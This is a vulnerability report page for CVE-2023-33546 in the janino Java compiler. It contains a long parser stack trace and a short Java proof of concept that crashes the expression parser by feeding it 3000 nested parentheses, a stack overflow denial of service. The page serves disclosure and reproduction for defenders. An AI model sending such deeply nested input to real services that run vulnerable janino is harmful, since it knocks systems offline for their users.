Headline
CVE-2023-33546: A Stack overflow error · Issue #201 · janino-compiler/janino
janino 3.1.9 and earlier are subject to denial of service (DOS) attacks when using the expression evaluator.guess parameter name method. If the parser runs on user-supplied input, an attacker could supply content that causes the parser to crash due to a stack overflow.
Description
janino 3.1.9 and earlier are subject to denial of service (DOS) attacks when using the expression evaluator.guess parameter name method. If the parser runs on user-supplied input, an attacker could supply content that causes the parser to crash due to a stack overflow.
Error Log
at org.codehaus.janino.TokenStreamImpl.produceToken(TokenStreamImpl.java:55)
at org.codehaus.janino.TokenStreamImpl.peek(TokenStreamImpl.java:94)
at org.codehaus.janino.TokenStreamImpl.peek(TokenStreamImpl.java:114)
at org.codehaus.janino.Parser.peek(Parser.java:3781)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3203)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
Reproducing
// PoC.java
import org.codehaus.commons.compiler.CompileException;
import org.codehaus.janino.ExpressionEvaluator;
import org.codehaus.janino.Scanner;
import java.io.IOException;
import java.io.StringReader;
public class PoC{
public static void test(String data) {
try{
ExpressionEvaluator.guessParameterNames(new Scanner(null, new StringReader(data)));
}
catch(IOException | CompileException | AssertionError e){
}
}
public static String _nestedDoc(int nesting, String open, String close, String content) {
StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
for (int i = 0; i < nesting; ++i) {
sb.append(open);
if ((i & 31) == 0) {
sb.append("\n");
}
}
sb.append("\n").append(content).append("\n");
for (int i = 0; i < nesting; ++i) {
sb.append(close);
if ((i & 31) == 0) {
sb.append("\n");
}
}
return sb.toString();
}
public static void main(String[] args) {
String TOO_DEEP_DOC = _nestedDoc(3000, "( ", ") ", "t");
// String TOO_DEEP_JSON = NestUtil._nestedDoc(1000, "{ ", "} ", "t");
test(TOO_DEEP_DOC);
}
}Related news
GHSA-gcg6-xv4f-f749: janino vulnerable to denial of service due to stack overflow
janino 3.1.9 and earlier is subject to denial of service (DOS) attacks when using the expression `evaluator.guess` parameter name method. If the parser runs on user-supplied input, an attacker could supply content that causes the parser to crash due to a stack overflow.